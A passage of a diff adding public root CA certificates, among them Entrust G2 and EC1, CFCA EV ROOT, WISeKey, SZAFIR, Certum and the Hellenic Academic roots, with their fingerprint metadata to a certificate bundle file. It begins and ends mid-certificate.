+tshquDDIajjDbp7hNxbqBWJMWxJH7ae0s1hWx0nzfxJoCTFx8G34Tkf71oXuxVhA
+GaQdp/lLQzfcaFpPz+vCZHTetBXZ9FRUGi8c15dxVJCO2SCdUyt/q4/i6jC8UDfv
+8Ue1fXwsBOxonbRJRBD0ckscZOf85muQ3Wl9af0AVqW3rLatt8o+Ae+c
+-----END CERTIFICATE-----
+
+# Issuer: CN=Entrust Root Certification Authority - G2 O=Entrust, Inc. OU=See www.entrust.net/legal-terms/(c) 2009 Entrust, Inc. - for authorized use only
+# Subject: CN=Entrust Root Certification Authority - G2 O=Entrust, Inc. OU=See www.entrust.net/legal-terms/(c) 2009 Entrust, Inc. - for authorized use only
+# Label: "Entrust Root Certification Authority - G2"
+# Serial: 1246989352
+# MD5 Fingerprint: 4b:e2:c9:91:96:65:0c:f4:0e:5a:93:92:a0:0a:fe:b2
+# SHA1 Fingerprint: 8c:f4:27:fd:79:0c:3a:d1:66:06:8d:e8:1e:57:ef:bb:93:22:72:d4
+# SHA256 Fingerprint: 43:df:57:74:b0:3e:7f:ef:5f:e4:0d:93:1a:7b:ed:f1:bb:2e:6b:42:73:8c:4e:6d:38:41:10:3d:3a:a7:f3:39
+-----BEGIN CERTIFICATE-----
+MIIEPjCCAyagAwIBAgIESlOMKDANBgkqhkiG9w0BAQsFADCBvjELMAkGA1UEBhMC
+VVMxFjAUBgNVBAoTDUVudHJ1c3QsIEluYy4xKDAmBgNVBAsTH1NlZSB3d3cuZW50
+cnVzdC5uZXQvbGVnYWwtdGVybXMxOTA3BgNVBAsTMChjKSAyMDA5IEVudHJ1c3Qs
+IEluYy4gLSBmb3IgYXV0aG9yaXplZCB1c2Ugb25seTEyMDAGA1UEAxMpRW50cnVz
+dCBSb290IENlcnRpZmljYXRpb24gQXV0aG9yaXR5IC0gRzIwHhcNMDkwNzA3MTcy
+NTU0WhcNMzAxMjA3MTc1NTU0WjCBvjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUVu
+dHJ1c3QsIEluYy4xKDAmBgNVBAsTH1NlZSB3d3cuZW50cnVzdC5uZXQvbGVnYWwt
+dGVybXMxOTA3BgNVBAsTMChjKSAyMDA5IEVudHJ1c3QsIEluYy4gLSBmb3IgYXV0
+aG9yaXplZCB1c2Ugb25seTEyMDAGA1UEAxMpRW50cnVzdCBSb290IENlcnRpZmlj
+YXRpb24gQXV0aG9yaXR5IC0gRzIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
+AoIBAQC6hLZy254Ma+KZ6TABp3bqMriVQRrJ2mFOWHLP/vaCeb9zYQYKpSfYs1/T
+RU4cctZOMvJyig/3gxnQaoCAAEUesMfnmr8SVycco2gvCoe9amsOXmXzHHfV1IWN
+cCG0szLni6LVhjkCsbjSR87kyUnEO6fe+1R9V77w6G7CebI6C1XiUJgWMhNcL3hW
+wcKUs/Ja5CeanyTXxuzQmyWC48zCxEXFjJd6BmsqEZ+pCm5IO2/b1BEZQvePB7/1
+U1+cPvQXLOZprE4yTGJ36rfo5bs0vBmLrpxR57d+tVOxMyLlbc9wPBr64ptntoP0
+jaWvYkxN4FisZDQSA/i2jZRjJKRxAgMBAAGjQjBAMA4GA1UdDwEB/wQEAwIBBjAP
+BgNVHRMBAf8EBTADAQH/MB0GA1UdDgQWBBRqciZ60B7vfec7aVHUbI2fkBJmqzAN
+BgkqhkiG9w0BAQsFAAOCAQEAeZ8dlsa2eT8ijYfThwMEYGprmi5ZiXMRrEPR9RP/
+jTkrwPK9T3CMqS/qF8QLVJ7UG5aYMzyorWKiAHarWWluBh1+xLlEjZivEtRh2woZ
+Rkfz6/djwUAFQKXSt/S1mja/qYh2iARVBCuch38aNzx+LaUa2NSJXsq9rD1s2G2v
+1fN2D807iDginWyTmsQ9v4IbZT+mD12q/OWyFcq1rca8PdCE6OoGcrBNOTJ4vz4R
+nAuknZoh8/CbCzB428Hch0P+vGOaysXCHMnHjf87ElgI5rY97HosTvuDls4MPGmH
+VHOkc8KT/1EQrBVUAdj8BbGJoX90g5pJ19xOe4pIb4tF9g==
+-----END CERTIFICATE-----
+
+# Issuer: CN=Entrust Root Certification Authority - EC1 O=Entrust, Inc. OU=See www.entrust.net/legal-terms/(c) 2012 Entrust, Inc. - for authorized use only
+# Subject: CN=Entrust Root Certification Authority - EC1 O=Entrust, Inc. OU=See www.entrust.net/legal-terms/(c) 2012 Entrust, Inc. - for authorized use only
+# Label: "Entrust Root Certification Authority - EC1"
+# Serial: 51543124481930649114116133369
+# MD5 Fingerprint: b6:7e:1d:f0:58:c5:49:6c:24:3b:3d:ed:98:18:ed:bc
+# SHA1 Fingerprint: 20:d8:06:40:df:9b:25:f5:12:25:3a:11:ea:f7:59:8a:eb:14:b5:47
+# SHA256 Fingerprint: 02:ed:0e:b2:8c:14:da:45:16:5c:56:67:91:70:0d:64:51:d7:fb:56:f0:b2:ab:1d:3b:8e:b0:70:e5:6e:df:f5
+-----BEGIN CERTIFICATE-----
+MIIC+TCCAoCgAwIBAgINAKaLeSkAAAAAUNCR+TAKBggqhkjOPQQDAzCBvzELMAkG
+A1UEBhMCVVMxFjAUBgNVBAoTDUVudHJ1c3QsIEluYy4xKDAmBgNVBAsTH1NlZSB3
+d3cuZW50cnVzdC5uZXQvbGVnYWwtdGVybXMxOTA3BgNVBAsTMChjKSAyMDEyIEVu
+dHJ1c3QsIEluYy4gLSBmb3IgYXV0aG9yaXplZCB1c2Ugb25seTEzMDEGA1UEAxMq
+RW50cnVzdCBSb290IENlcnRpZmljYXRpb24gQXV0aG9yaXR5IC0gRUMxMB4XDTEy
+MTIxODE1MjUzNloXDTM3MTIxODE1NTUzNlowgb8xCzAJBgNVBAYTAlVTMRYwFAYD
+VQQKEw1FbnRydXN0LCBJbmMuMSgwJgYDVQQLEx9TZWUgd3d3LmVudHJ1c3QubmV0
+L2xlZ2FsLXRlcm1zMTkwNwYDVQQLEzAoYykgMjAxMiBFbnRydXN0LCBJbmMuIC0g
+Zm9yIGF1dGhvcml6ZWQgdXNlIG9ubHkxMzAxBgNVBAMTKkVudHJ1c3QgUm9vdCBD
+ZXJ0aWZpY2F0aW9uIEF1dGhvcml0eSAtIEVDMTB2MBAGByqGSM49AgEGBSuBBAAi
+A2IABIQTydC6bUF74mzQ61VfZgIaJPRbiWlH47jCffHyAsWfoPZb1YsGGYZPUxBt
+ByQnoaD41UcZYUx9ypMn6nQM72+WCf5j7HBdNq1nd67JnXxVRDqiY1Ef9eNi1KlH
+Bz7MIKNCMEAwDgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0O
+BBYEFLdj5xrdjekIplWDpOBqUEFlEUJJMAoGCCqGSM49BAMDA2cAMGQCMGF52OVC
+R98crlOZF7ZvHH3hvxGU0QOIdeSNiaSKd0bebWHvAvX7td/M/k7//qnmpwIwW5nX
+hTcGtXsI/esni0qU+eH6p44mCOh8kmhtc9hvJqwhAriZtyZBWyVgrtBIGu4G
+-----END CERTIFICATE-----
+
+# Issuer: CN=CFCA EV ROOT O=China Financial Certification Authority
+# Subject: CN=CFCA EV ROOT O=China Financial Certification Authority
+# Label: "CFCA EV ROOT"
+# Serial: 407555286
+# MD5 Fingerprint: 74:e1:b6:ed:26:7a:7a:44:30:33:94:ab:7b:27:81:30
+# SHA1 Fingerprint: e2:b8:29:4b:55:84:ab:6b:58:c2:90:46:6c:ac:3f:b8:39:8f:84:83
+# SHA256 Fingerprint: 5c:c3:d7:8e:4e:1d:5e:45:54:7a:04:e6:87:3e:64:f9:0c:f9:53:6d:1c:cc:2e:f8:00:f3:55:c4:c5:fd:70:fd
+-----BEGIN CERTIFICATE-----
+MIIFjTCCA3WgAwIBAgIEGErM1jANBgkqhkiG9w0BAQsFADBWMQswCQYDVQQGEwJD
+TjEwMC4GA1UECgwnQ2hpbmEgRmluYW5jaWFsIENlcnRpZmljYXRpb24gQXV0aG9y
+aXR5MRUwEwYDVQQDDAxDRkNBIEVWIFJPT1QwHhcNMTIwODA4MDMwNzAxWhcNMjkx
+MjMxMDMwNzAxWjBWMQswCQYDVQQGEwJDTjEwMC4GA1UECgwnQ2hpbmEgRmluYW5j
+aWFsIENlcnRpZmljYXRpb24gQXV0aG9yaXR5MRUwEwYDVQQDDAxDRkNBIEVWIFJP
+T1QwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDXXWvNED8fBVnVBU03
+sQ7smCuOFR36k0sXgiFxEFLXUWRwFsJVaU2OFW2fvwwbwuCjZ9YMrM8irq93VCpL
+TIpTUnrD7i7es3ElweldPe6hL6P3KjzJIx1qqx2hp/Hz7KDVRM8Vz3IvHWOX6Jn5
+/ZOkVIBMUtRSqy5J35DNuF++P96hyk0g1CXohClTt7GIH//62pCfCqktQT+x8Rgp
+7hZZLDRJGqgG16iI0gNyejLi6mhNbiyWZXvKWfry4t3uMCz7zEasxGPrb382KzRz
+EpR/38wmnvFyXVBlWY9ps4deMm/DGIq1lY+wejfeWkU7xzbh72fROdOXW3NiGUgt
+hxwG+3SYIElz8AXSG7Ggo7cbcNOIabla1jj0Ytwli3i/+Oh+uFzJlU9fpy25IGvP
+a931DfSCt/SyZi4QKPaXWnuWFo8BGS1sbn85WAZkgwGDg8NNkt0yxoekN+kWzqot
+aK8KgWU6cMGbrU1tVMoqLUuFG7OA5nBFDWteNfB/O7ic5ARwiRIlk9oKmSJgamNg
+TnYGmE69g60dWIolhdLHZR4tjsbftsbhf4oEIRUpdPA+nJCdDC7xij5aqgwJHsfV
+PKPtl8MeNPo4+QgO48BdK4PRVmrJtqhUUy54Mmc9gn900PvhtgVguXDbjgv5E1hv
+cWAQUhC5wUEJ73IfZzF4/5YFjQIDAQABo2MwYTAfBgNVHSMEGDAWgBTj/i39KNAL
+tbq2osS/BqoFjJP7LzAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIBBjAd
+BgNVHQ4EFgQU4/4t/SjQC7W6tqLEvwaqBYyT+y8wDQYJKoZIhvcNAQELBQADggIB
+ACXGumvrh8vegjmWPfBEp2uEcwPenStPuiB/vHiyz5ewG5zz13ku9Ui20vsXiObT
+ej/tUxPQ4i9qecsAIyjmHjdXNYmEwnZPNDatZ8POQQaIxffu2Bq41gt/UP+TqhdL
+jOztUmCypAbqTuv0axn96/Ua4CUqmtzHQTb3yHQFhDmVOdYLO6Qn+gjYXB74BGBS
+ESgoA//vU2YApUo0FmZ8/Qmkrp5nGm9BC2sGE5uPhnEFtC+NiWYzKXZUmhH4J/qy
+P5Hgzg0b8zAarb8iXRvTvyUFTeGSGn+ZnzxEk8rUQElsgIfXBDrDMlI1Dlb4pd19 +xIsNER9Tyx6yF7Zod1rg1MvIB671Oi6ON7fQAUtDKXeMOZePglr4UeWJoBjnaH9d +Ci77o0cOPaYjesYBx4/IXr9tgFa+iiS6M+qf4TIRnvHST4D2G0CvOJ4RUHlzEhLN +5mydLIhyPDCBBpEi6lmt2hkuIsKNuYyH4Ga8cyNfIWRjgEj1oDwYPZTISEEdQLpe +/v5WOaHIz16eGWRGENoXkbcFgKyLmZJ956LYBws2J+dIeWCKw9cTXPhyQN9Ky8+Z +AAoACxGV2lZFA4gKn2fQ1XmxqI1AbQ3CekD6819kR5LLU7m7Wc5P/dAVUwHY3+vZ +5nbv0CO7O6l5s9UCKc2Jo5YPSjXnTkLAdc0Hz+Ys63su +-----END CERTIFICATE----- + +# Issuer: CN=OISTE WISeKey Global Root GB CA O=WISeKey OU=OISTE Foundation Endorsed +# Subject: CN=OISTE WISeKey Global Root GB CA O=WISeKey OU=OISTE Foundation Endorsed +# Label: "OISTE WISeKey Global Root GB CA" +# Serial: 157768595616588414422159278966750757568 +# MD5 Fingerprint: a4:eb:b9:61:28:2e:b7:2f:98:b0:35:26:90:99:51:1d +# SHA1 Fingerprint: 0f:f9:40:76:18:d3:d7:6a:4b:98:f0:a8:35:9e:0c:fd:27:ac:cc:ed +# SHA256 Fingerprint: 6b:9c:08:e8:6e:b0:f7:67:cf:ad:65:cd:98:b6:21:49:e5:49:4a:67:f5:84:5e:7b:d1:ed:01:9f:27:b8:6b:d6 +-----BEGIN CERTIFICATE----- +MIIDtTCCAp2gAwIBAgIQdrEgUnTwhYdGs/gjGvbCwDANBgkqhkiG9w0BAQsFADBt +MQswCQYDVQQGEwJDSDEQMA4GA1UEChMHV0lTZUtleTEiMCAGA1UECxMZT0lTVEUg +Rm91bmRhdGlvbiBFbmRvcnNlZDEoMCYGA1UEAxMfT0lTVEUgV0lTZUtleSBHbG9i +YWwgUm9vdCBHQiBDQTAeFw0xNDEyMDExNTAwMzJaFw0zOTEyMDExNTEwMzFaMG0x +CzAJBgNVBAYTAkNIMRAwDgYDVQQKEwdXSVNlS2V5MSIwIAYDVQQLExlPSVNURSBG +b3VuZGF0aW9uIEVuZG9yc2VkMSgwJgYDVQQDEx9PSVNURSBXSVNlS2V5IEdsb2Jh +bCBSb290IEdCIENBMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2Be3 +HEokKtaXscriHvt9OO+Y9bI5mE4nuBFde9IllIiCFSZqGzG7qFshISvYD06fWvGx +WuR51jIjK+FTzJlFXHtPrby/h0oLS5daqPZI7H17Dc0hBt+eFf1Biki3IPShehtX +1F1Q/7pn2COZH8g/497/b1t3sWtuuMlk9+HKQUYOKXHQuSP8yYFfTvdv37+ErXNk +u7dCjmn21HYdfp2nuFeKUWdy19SouJVUQHMD9ur06/4oQnc/nSMbsrY9gBQHTC5P +99UKFg29ZkM3fiNDecNAhvVMKdqOmq0NpQSHiB6F4+lT1ZvIiwNjeOvgGUpuuy9r +M2RYk61pv48b74JIxwIDAQABo1EwTzALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUw +AwEB/zAdBgNVHQ4EFgQUNQ/INmNe4qPs+TtmFc5RUuORmj0wEAYJKwYBBAGCNxUB +BAMCAQAwDQYJKoZIhvcNAQELBQADggEBAEBM+4eymYGQfp3FsLAmzYh7KzKNbrgh +cViXfa43FK8+5/ea4n32cZiZBKpDdHij40lhPnOMTZTg+XHEthYOU3gf1qKHLwI5 +gSk8rxWYITD+KJAAjNHhy/peyP34EEY7onhCkRd0VQreUGdNZtGn//3ZwLWoo4rO +ZvUPQ82nK1d7Y0Zqqi5S2PTt4W2tKZB4SLrhI6qjiey1q5bAtEuiHZeeevJuQHHf +aPFlTc58Bd9TZaml8LGXBHAVRgOY1NK/VLSgWH1Sb9pWJmLU2NuJMW8c8CLC02Ic +Nc1MaRVUGpCY3useX8p3x8uOPUNpnJpY0CQ73xtAln41rYHHTnG6iBM= +-----END CERTIFICATE----- + +# Issuer: CN=SZAFIR ROOT CA2 O=Krajowa Izba Rozliczeniowa S.A. +# Subject: CN=SZAFIR ROOT CA2 O=Krajowa Izba Rozliczeniowa S.A. 
+# Label: "SZAFIR ROOT CA2" +# Serial: 357043034767186914217277344587386743377558296292 +# MD5 Fingerprint: 11:64:c1:89:b0:24:b1:8c:b1:07:7e:89:9e:51:9e:99 +# SHA1 Fingerprint: e2:52:fa:95:3f:ed:db:24:60:bd:6e:28:f3:9c:cc:cf:5e:b3:3f:de +# SHA256 Fingerprint: a1:33:9d:33:28:1a:0b:56:e5:57:d3:d3:2b:1c:e7:f9:36:7e:b0:94:bd:5f:a7:2a:7e:50:04:c8:de:d7:ca:fe +-----BEGIN CERTIFICATE----- +MIIDcjCCAlqgAwIBAgIUPopdB+xV0jLVt+O2XwHrLdzk1uQwDQYJKoZIhvcNAQEL +BQAwUTELMAkGA1UEBhMCUEwxKDAmBgNVBAoMH0tyYWpvd2EgSXpiYSBSb3psaWN6 +ZW5pb3dhIFMuQS4xGDAWBgNVBAMMD1NaQUZJUiBST09UIENBMjAeFw0xNTEwMTkw +NzQzMzBaFw0zNTEwMTkwNzQzMzBaMFExCzAJBgNVBAYTAlBMMSgwJgYDVQQKDB9L +cmFqb3dhIEl6YmEgUm96bGljemVuaW93YSBTLkEuMRgwFgYDVQQDDA9TWkFGSVIg +Uk9PVCBDQTIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC3vD5QqEvN +QLXOYeeWyrSh2gwisPq1e3YAd4wLz32ohswmUeQgPYUM1ljj5/QqGJ3a0a4m7utT +3PSQ1hNKDJA8w/Ta0o4NkjrcsbH/ON7Dui1fgLkCvUqdGw+0w8LBZwPd3BucPbOw +3gAeqDRHu5rr/gsUvTaE2g0gv/pby6kWIK05YO4vdbbnl5z5Pv1+TW9NL++IDWr6 +3fE9biCloBK0TXC5ztdyO4mTp4CEHCdJckm1/zuVnsHMyAHs6A6KCpbns6aH5db5 +BSsNl0BwPLqsdVqc1U2dAgrSS5tmS0YHF2Wtn2yIANwiieDhZNRnvDF5YTy7ykHN +XGoAyDw4jlivAgMBAAGjQjBAMA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQD +AgEGMB0GA1UdDgQWBBQuFqlKGLXLzPVvUPMjX/hd56zwyDANBgkqhkiG9w0BAQsF +AAOCAQEAtXP4A9xZWx126aMqe5Aosk3AM0+qmrHUuOQn/6mWmc5G4G18TKI4pAZw +8PRBEew/R40/cof5O/2kbytTAOD/OblqBw7rHRz2onKQy4I9EYKL0rufKq8h5mOG +nXkZ7/e7DDWQw4rtTw/1zBLZpD67oPwglV9PJi8RI4NOdQcPv5vRtB3pEAT+ymCP +oky4rc/hkA/NrgrHXXu3UNLUYfrVFdvXn4dRVOul4+vJhaAlIDf7js4MNIThPIGy +d05DpYhfhmehPea0XGG2Ptv+tyjFogeutcrKjSoS75ftwjCkySp6+/NNIxuZMzSg +LvWpCz/UXeHPhJ/iGcJfitYgHuNztw== +-----END CERTIFICATE----- + +# Issuer: CN=Certum Trusted Network CA 2 O=Unizeto Technologies S.A. OU=Certum Certification Authority +# Subject: CN=Certum Trusted Network CA 2 O=Unizeto Technologies S.A. 
OU=Certum Certification Authority +# Label: "Certum Trusted Network CA 2" +# Serial: 44979900017204383099463764357512596969 +# MD5 Fingerprint: 6d:46:9e:d9:25:6d:08:23:5b:5e:74:7d:1e:27:db:f2 +# SHA1 Fingerprint: d3:dd:48:3e:2b:bf:4c:05:e8:af:10:f5:fa:76:26:cf:d3:dc:30:92 +# SHA256 Fingerprint: b6:76:f2:ed:da:e8:77:5c:d3:6c:b0:f6:3c:d1:d4:60:39:61:f4:9e:62:65:ba:01:3a:2f:03:07:b6:d0:b8:04 +-----BEGIN CERTIFICATE----- +MIIF0jCCA7qgAwIBAgIQIdbQSk8lD8kyN/yqXhKN6TANBgkqhkiG9w0BAQ0FADCB +gDELMAkGA1UEBhMCUEwxIjAgBgNVBAoTGVVuaXpldG8gVGVjaG5vbG9naWVzIFMu +QS4xJzAlBgNVBAsTHkNlcnR1bSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEkMCIG +A1UEAxMbQ2VydHVtIFRydXN0ZWQgTmV0d29yayBDQSAyMCIYDzIwMTExMDA2MDgz +OTU2WhgPMjA0NjEwMDYwODM5NTZaMIGAMQswCQYDVQQGEwJQTDEiMCAGA1UEChMZ +VW5pemV0byBUZWNobm9sb2dpZXMgUy5BLjEnMCUGA1UECxMeQ2VydHVtIENlcnRp +ZmljYXRpb24gQXV0aG9yaXR5MSQwIgYDVQQDExtDZXJ0dW0gVHJ1c3RlZCBOZXR3 +b3JrIENBIDIwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQC9+Xj45tWA +DGSdhhuWZGc/IjoedQF97/tcZ4zJzFxrqZHmuULlIEub2pt7uZld2ZuAS9eEQCsn +0+i6MLs+CRqnSZXvK0AkwpfHp+6bJe+oCgCXhVqqndwpyeI1B+twTUrWwbNWuKFB +OJvR+zF/j+Bf4bE/D44WSWDXBo0Y+aomEKsq09DRZ40bRr5HMNUuctHFY9rnY3lE +fktjJImGLjQ/KUxSiyqnwOKRKIm5wFv5HdnnJ63/mgKXwcZQkpsCLL2puTRZCr+E +Sv/f/rOf69me4Jgj7KZrdxYq28ytOxykh9xGc14ZYmhFV+SQgkK7QtbwYeDBoz1m +o130GO6IyY0XRSmZMnUCMe4pJshrAua1YkV/NxVaI2iJ1D7eTiew8EAMvE0Xy02i +sx7QBlrd9pPPV3WZ9fqGGmd4s7+W/jTcvedSVuWz5XV710GRBdxdaeOVDUO5/IOW +OZV7bIBaTxNyxtd9KXpEulKkKtVBRgkg/iKgtlswjbyJDNXXcPiHUv3a76xRLgez +Tv7QCdpw75j6VuZt27VXS9zlLCUVyJ4ueE742pyehizKV/Ma5ciSixqClnrDvFAS +adgOWkaLOusm+iPJtrCBvkIApPjW/jAux9JG9uWOdf3yzLnQh1vMBhBgu4M1t15n +3kfsmUjxpKEV/q2MYo45VU85FrmxY53/twIDAQABo0IwQDAPBgNVHRMBAf8EBTAD +AQH/MB0GA1UdDgQWBBS2oVQ5AsOgP46KvPrU+Bym0ToO/TAOBgNVHQ8BAf8EBAMC +AQYwDQYJKoZIhvcNAQENBQADggIBAHGlDs7k6b8/ONWJWsQCYftMxRQXLYtPU2sQ +F/xlhMcQSZDe28cmk4gmb3DWAl45oPePq5a1pRNcgRRtDoGCERuKTsZPpd1iHkTf +CVn0W3cLN+mLIMb4Ck4uWBzrM9DPhmDJ2vuAL55MYIR4PSFk1vtBHxgP58l1cb29 +XN40hz5BsA72udY/CROWFC/emh1auVbONTqwX3BNXuMp8SMoclm2q8KMZiYcdywm +djWLKKdpoPk79SPdhRB0yZADVpHnr7pH1BKXESLjokmUbOe3lEu6LaTaM4tMpkT/ +WjzGHWTYtTHkpjx6qFcL2+1hGsvxznN3Y6SHb0xRONbkX8eftoEq5IVIeVheO/jb +AoJnwTnbw3RLPTYe+SmTiGhbqEQZIfCn6IENLOiTNrQ3ssqwGyZ6miUfmpqAnksq +P/ujmv5zMnHCnsZy4YpoJ/HkD7TETKVhk/iXEAcqMCWpuchxuO9ozC1+9eB+D4Ko +b7a6bINDd82Kkhehnlt4Fj1F4jNy3eFmypnTycUm/Q1oBEauttmbjL4ZvrHG8hnj +XALKLNhvSgfZyTXaQHXyxKcZb55CEJh15pWLYLztxRLXis7VmFxWlgPF7ncGNf/P +5O4/E2Hu29othfDNrp2yGAlFw5Khchf8R7agCyzxxN5DaAhqXzvwdmP7zAYspsbi +DrW5viSP +-----END CERTIFICATE----- + +# Issuer: CN=Hellenic Academic and Research Institutions RootCA 2015 O=Hellenic Academic and Research Institutions Cert. Authority +# Subject: CN=Hellenic Academic and Research Institutions RootCA 2015 O=Hellenic Academic and Research Institutions Cert. 
Authority +# Label: "Hellenic Academic and Research Institutions RootCA 2015" +# Serial: 0 +# MD5 Fingerprint: ca:ff:e2:db:03:d9:cb:4b:e9:0f:ad:84:fd:7b:18:ce +# SHA1 Fingerprint: 01:0c:06:95:a6:98:19:14:ff:bf:5f:c6:b0:b6:95:ea:29:e9:12:a6 +# SHA256 Fingerprint: a0:40:92:9a:02:ce:53:b4:ac:f4:f2:ff:c6:98:1c:e4:49:6f:75:5e:6d:45:fe:0b:2a:69:2b:cd:52:52:3f:36 +-----BEGIN CERTIFICATE----- +MIIGCzCCA/OgAwIBAgIBADANBgkqhkiG9w0BAQsFADCBpjELMAkGA1UEBhMCR1Ix +DzANBgNVBAcTBkF0aGVuczFEMEIGA1UEChM7SGVsbGVuaWMgQWNhZGVtaWMgYW5k +IFJlc2VhcmNoIEluc3RpdHV0aW9ucyBDZXJ0LiBBdXRob3JpdHkxQDA+BgNVBAMT +N0hlbGxlbmljIEFjYWRlbWljIGFuZCBSZXNlYXJjaCBJbnN0aXR1dGlvbnMgUm9v +dENBIDIwMTUwHhcNMTUwNzA3MTAxMTIxWhcNNDAwNjMwMTAxMTIxWjCBpjELMAkG +A1UEBhMCR1IxDzANBgNVBAcTBkF0aGVuczFEMEIGA1UEChM7SGVsbGVuaWMgQWNh +ZGVtaWMgYW5kIFJlc2VhcmNoIEluc3RpdHV0aW9ucyBDZXJ0LiBBdXRob3JpdHkx +QDA+BgNVBAMTN0hlbGxlbmljIEFjYWRlbWljIGFuZCBSZXNlYXJjaCBJbnN0aXR1 +dGlvbnMgUm9vdENBIDIwMTUwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC +AQDC+Kk/G4n8PDwEXT2QNrCROnk8ZlrvbTkBSRq0t89/TSNTt5AA4xMqKKYx8ZEA +4yjsriFBzh/a/X0SWwGDD7mwX5nh8hKDgE0GPt+sr+ehiGsxr/CL0BgzuNtFajT0 +AoAkKAoCFZVedioNmToUW/bLy1O8E00BiDeUJRtCvCLYjqOWXjrZMts+6PAQZe10 +4S+nfK8nNLspfZu2zwnI5dMK/IhlZXQK3HMcXM1AsRzUtoSMTFDPaI6oWa7CJ06C +ojXdFPQf/7J31Ycvqm59JCfnxssm5uX+Zwdj2EUN3TpZZTlYepKZcj2chF6IIbjV +9Cz82XBST3i4vTwri5WY9bPRaM8gFH5MXF/ni+X1NYEZN9cRCLdmvtNKzoNXADrD +gfgXy5I2XdGj2HUb4Ysn6npIQf1FGQatJ5lOwXBH3bWfgVMS5bGMSF0xQxfjjMZ6 +Y5ZLKTBOhE5iGV48zpeQpX8B653g+IuJ3SWYPZK2fu/Z8VFRfS0myGlZYeCsargq +NhEEelC9MoS+L9xy1dcdFkfkR2YgP/SWxa+OAXqlD3pk9Q0Yh9muiNX6hME6wGko +LfINaFGq46V3xqSQDqE3izEjR8EJCOtu93ib14L8hCCZSRm2Ekax+0VVFqmjZayc +Bw/qa9wfLgZy7IaIEuQt218FL+TwA9MmM+eAws1CoRc0CwIDAQABo0IwQDAPBgNV +HRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIBBjAdBgNVHQ4EFgQUcRVnyMjJvXVd +ctA4GGqd83EkVAswDQYJKoZIhvcNAQELBQADggIBAHW7bVRLqhBYRjTyYtcWNl0I +XtVsyIe9tC5G8jH4fOpCtZMWVdyhDBKg2mF+D1hYc2Ryx+hFjtyp8iY/xnmMsVMI +M4GwVhO+5lFc2JsKT0ucVlMC6U/2DWDqTUJV6HwbISHTGzrMd/K4kPFox/la/vot +9L/J9UUbzjgQKjeKeaO04wlshYaT/4mWJ3iBj2fjRnRUjtkNaeJK9E10A/+yd+2V +Z5fkscWrv2oj6NSU4kQoYsRL4vDY4ilrGnB+JGGTe08DMiUNRSQrlrRGar9KC/ea +j8GsGsVn82800vpzY4zvFrCopEYq+OsS7HK07/grfoxSwIuEVPkvPuNVqNxmsdnh +X9izjFk0WaSrT2y7HxjbdavYy5LNlDhhDgcGH0tGEPEVvo2FXDtKK4F5D7Rpn0lQ +l033DlZdwJVqwjbDG2jJ9SrcR5q+ss7FJej6A7na+RZukYT1HCjI/CbM1xyQVqdf +bzoEvM14iQuODy+jqk+iGxI9FghAD/FGTNeqewjBCvVtJ94Cj8rDtSvK6evIIVM4 +pcw72Hc3MKJP2W/R8kCtQXoXxdZKNYm3QdV8hn9VTYNKpXMgwDqvkPGaJI7ZjnHK +e7iG2rKPmT4dEw0SEe7Uq/DpFXYC5ODfqiAeW2GFZECpkJcNrVPSWh2HagCXZWK0 +vm9qp/UsQu0yrbYhnr68 +-----END CERTIFICATE----- + +# Issuer: CN=Hellenic Academic and Research Institutions ECC RootCA 2015 O=Hellenic Academic and Research Institutions Cert. Authority +# Subject: CN=Hellenic Academic and Research Institutions ECC RootCA 2015 O=Hellenic Academic and Research Institutions Cert. 
Authority +# Label: "Hellenic Academic and Research Institutions ECC RootCA 2015" +# Serial: 0 +# MD5 Fingerprint: 81:e5:b4:17:eb:c2:f5:e1:4b:0d:41:7b:49:92:fe:ef +# SHA1 Fingerprint: 9f:f1:71:8d:92:d5:9a:f3:7d:74:97:b4:bc:6f:84:68:0b:ba:b6:66 +# SHA256 Fingerprint: 44:b5:45:aa:8a:25:e6:5a:73:ca:15:dc:27:fc:36:d2:4c:1c:b9:95:3a:06:65:39:b1:15:82:dc:48:7b:48:33 +-----BEGIN CERTIFICATE----- +MIICwzCCAkqgAwIBAgIBADAKBggqhkjOPQQDAjCBqjELMAkGA1UEBhMCR1IxDzAN +BgNVBAcTBkF0aGVuczFEMEIGA1UEChM7SGVsbGVuaWMgQWNhZGVtaWMgYW5kIFJl +c2VhcmNoIEluc3RpdHV0aW9ucyBDZXJ0LiBBdXRob3JpdHkxRDBCBgNVBAMTO0hl +bGxlbmljIEFjYWRlbWljIGFuZCBSZXNlYXJjaCBJbnN0aXR1dGlvbnMgRUNDIFJv +b3RDQSAyMDE1MB4XDTE1MDcwNzEwMzcxMloXDTQwMDYzMDEwMzcxMlowgaoxCzAJ +BgNVBAYTAkdSMQ8wDQYDVQQHEwZBdGhlbnMxRDBCBgNVBAoTO0hlbGxlbmljIEFj +YWRlbWljIGFuZCBSZXNlYXJjaCBJbnN0aXR1dGlvbnMgQ2VydC4gQXV0aG9yaXR5 +MUQwQgYDVQQDEztIZWxsZW5pYyBBY2FkZW1pYyBhbmQgUmVzZWFyY2ggSW5zdGl0 +dXRpb25zIEVDQyBSb290Q0EgMjAxNTB2MBAGByqGSM49AgEGBSuBBAAiA2IABJKg +QehLgoRc4vgxEZmGZE4JJS+dQS8KrjVPdJWyUWRrjWvmP3CV8AVER6ZyOFB2lQJa +jq4onvktTpnvLEhvTCUp6NFxW98dwXU3tNf6e3pCnGoKVlp8aQuqgAkkbH7BRqNC +MEAwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFLQi +C4KZJAEOnLvkDv2/+5cgk5kqMAoGCCqGSM49BAMCA2cAMGQCMGfOFmI4oqxiRaep 